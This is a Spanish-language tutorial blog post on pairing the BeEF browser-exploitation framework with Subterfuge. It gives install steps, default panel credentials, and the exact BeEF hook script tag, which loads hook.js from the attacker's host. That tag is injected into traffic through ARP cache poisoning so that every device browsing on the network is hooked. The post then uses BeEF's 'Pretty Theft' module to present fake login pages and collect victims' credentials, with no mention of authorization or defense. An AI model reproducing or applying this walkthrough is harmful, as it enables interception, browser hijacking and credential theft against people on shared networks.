Post13 n

Ataques de ingeniería social usando Beef y Subterfuge


Profile
Omar Jacobo Muñoz Veliz


Beef Es un framework que viene por defecto en Kali Linux y sus versiones anteriores este está orientado en la explotación de vulnerabilidades en los navegadores web por medio de una página infectada en la cual cada usuario que entre a la página puede ser infectado por varios vectores de ataque, es un framework flexible que se puede unir a herramientas de explotación como Cobalt Strike.

G:\Backtrackacademy\Captura de pantalla de 2016-03-15 20-39-54.png

Estos son los datos que nos muestra cuando dispositivo está navegando 

Subterfuge es un framework muy usado para realizar ataques Man-in-the-Middle como también para poder realizar múltiples ataques como Session Hijacking y robo de cookies.

G:\Backtrackacademy\Captura de pantalla de 2016-03-15 20-32-42.png

Estos son los datos que se nos muestran al entrar a subterfuge.

¿Por qué usar Beef y Subterfuge juntos?

Si por separado estos dos frameworks son de mucha ayuda te imaginas lo que logran hacer ahora juntos son invencibles, lo que se hace al momento de unirlos es que pasamos el javascript infectado de beef y subterfuge se encargara de envenar el router para que cada vez que alguien este navegando por internet nos dé un completo detalle de quien es y a que es vulnerable. Al hacer esto nos deja la facilidad de ver que si le afectan los exploits de hacking team o muchos otros vectores.

G:\Backtrackacademy\Captura de pantalla de 2016-03-15 20-39-54.png


Instalación de Beef

Este viene por defecto en kali linux pero se puede puede descargar e instalar en cualquier distribucion de linux solo es necesario tener instalado ruby.

El enlace para descargarlo es

https://github.com/beefproject/beef

Subterfuge

En enlace para descargarlo es

https://github.com/Subterfuge-Framework/Subterfuge

Ojo: Cuando lo instale me dio un problema que se resuelve poniendo en la terminal el siguiente comando.

pip install django==1.5

Una vez esto lo primero que haremos es iniciar el servicio de beef

G:\Backtrackacademy\Captura de pantalla de 2016-03-15 20-27-59.png


Ahora entramos al navegador a la dirección que nos genera 192.168.1.9:5000/ui/panel

G:\Backtrackacademy\Captura de pantalla de 2016-03-15 20-28-21.png


El usuario y contraseña por defecto es “beef”.

Luego de esto nos llevara al menú principal

G:\Backtrackacademy\Captura de pantalla de 2016-03-15 20-28-26.png


Ahora iniciamos subterfuge

G:\Backtrackacademy\Captura de pantalla de 2016-03-15 20-30-10.png


Y luego de eso ingresaremos al link que genera

G:\Backtrackacademy\Captura de pantalla de 2016-03-15 20-32-28.png


Ahora lo siguiente es poner el javascript que contiene el archivo dentro del “MITM Vector:ARP Cache Poisoning”

El script es <script languaje=javascript src=http://192.168.1.9:3000/hook.js></script>

G:\Backtrackacademy\Captura de pantalla de 2016-03-15 20-32-28.png


Ahora al darle “Start” en la terminal empezara a capturar a todos los que naveguen por internet.

G:\Backtrackacademy\Captura de pantalla de 2016-03-15 20-33-11.png

Para realizar un ataque de ingeniería social nos posicionamos sobre nuestra víctima y nos vamos a la pestaña “Commands” y donde dice “Pretty Theft” le daremos click y seleccionaremos con que página hacer caer a la víctima, las credenciales nos saldrán donde dice “Module Results History”

G:\Backtrackacademy\Captura de pantalla de 2016-03-15 20-52-41.png


A la víctima le aparecerá lo siguiente.

C:\Users\Jake\Desktop\Backtrack.jpg

C:\Users\Jake\Desktop\backtrack1.jpg




Artículos que te pueden interesar